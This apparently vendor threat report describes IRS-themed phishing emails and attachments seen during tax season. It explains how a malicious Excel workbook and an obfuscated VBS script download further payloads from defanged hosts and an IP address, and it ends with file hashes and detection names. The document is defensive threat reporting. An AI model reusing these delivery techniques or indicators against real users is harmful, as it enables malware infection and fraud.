FortiGuard Labs Threat Research Report
The tax deadline is fast approaching. It’s that time of the year when individuals and organizations scramble to file their forms. And like clockwork, malicious actors predictably try to cash in on this yearly event, and the FortiGuard Labs team has noticed.
Perhaps the most important takeaway from this blog may be that ANY email claiming to be from the IRS is a scam. It is your first and best clue. In fact, as a word of warning, the United States Internal Revenue Service specifically states that they "will not initiate email contact with you without your consent.”
And yet, every year, threat actors take advantage of the fact that not everyone knows this particular IRS policy. And as a result, they manage to successfully prey on individuals who are either worried or confused about filing their taxes.
In this blog, we will show you a number of lures being used by these criminals, how they are being used, and what you can do about them.
Nearly every email-based attack includes tricking the recipient into opening a file or clicking on a link that has been embedded with malicious code. These are often documents or spreadsheets infected with macros that inject malware into the user’s device, links to malicious websites, or actual executables that launch malware.
The first email lure we will discuss attempts to trick the user into opening an attached Excel sheet by pretending that it is a new form related to recent Covid-19 policy changes.
It pretends to have been sent from an administrative assistant working in the IRS Head Department. (A careful observer would notice that the term “head department” sounds contrived. That’s because it is. There is no such thing as a “head department” in the IRS, or frankly, in any US-based agency. It’s a clue that the attackers are likely from another country.)
Combining both taxes and Covid is designed to make the target more apprehensive and increase the likelihood that the attachment is viewed. The attachment itself is a malicious Excel binary workbook that eventually attempts to download and execute a DLL file from hxxp://sported[.]xyz. This particular tax lure is used by the Trickbot group.
Not to be outdone, a similar tax-related lure can be seen in the following email sent in the same week.
While trying to look official, this fake email contains both spelling and grammar mistakes. The link in the email body goes to hxxp://enter[.]prologin[.]net/assets2/global/plugins/amcharts/type[.]php. (Hovering your mouse over a link will reveal its true web address. Besides the fact that the IRS never sends communications via email, any government link would include a .gov top level domain. In this case, you can see that this is a .net domain, which has its own uses explained here.)
After some redirection through the hxxps://[hacked domain] /unconvincingly[.]php page, the script downloads a zip file from a legitimate domain for a judicial branch of the United States government. (We have also reached out to this agency so they can take appropriate remediation steps.) This archive contains a VBS file that hides malicious code inside innocuous junk code to try and make itself look benign.
This VBS file uses the COM function to launch both wscript and cscript, as well as cmd and bitsadmin tools to download a file from the hxxp://23[.]227[.]198[.]243/static/settings/ directory and save it as %temp%/ScalabilityFix.tmp. Currently, the C2 server is not serving the next stage. The campaign may already be over, or the C2 server may be waiting for a specific target to visit this watering hole.
As tax season approaches, so are the scams. We are already seeing attacks, and we expect to see a lot more malicious activity over the next few weeks. Users need to be diligent, as some of these scams are getting more believable. When other matters like the pandemic or deadlines about money are on a person’s mind, a carefully crafted email may slip through the cracks. At such a time, it is important to remember that the IRS never communicates with citizens using email. With that in mind, and with some careful diligence, you should be able to avoid being a victim this tax season.
Being prepared against such inevitable attacks can take many forms to ensure a robust security strategy. The following protections can be put in place to mitigate a threat before it ever reaches the network.
In addition, Fortinet customers are directly protected from the malicious attacks detailed in this blog.
Customers running the latest FortiClient Antivirus definitions are protected by the following signatures:
Malicious Excel fileMD5: 9236b9c6aa22afd71b5309997ee95c85
Malicious VBS fileMD5: 7D8273BB0912B2F3ADD7609C24F317C0
Detection Name: VBS/Agent.VDK!tr
The following network IOCs are currently blocked by FortiGuard Web Filtering: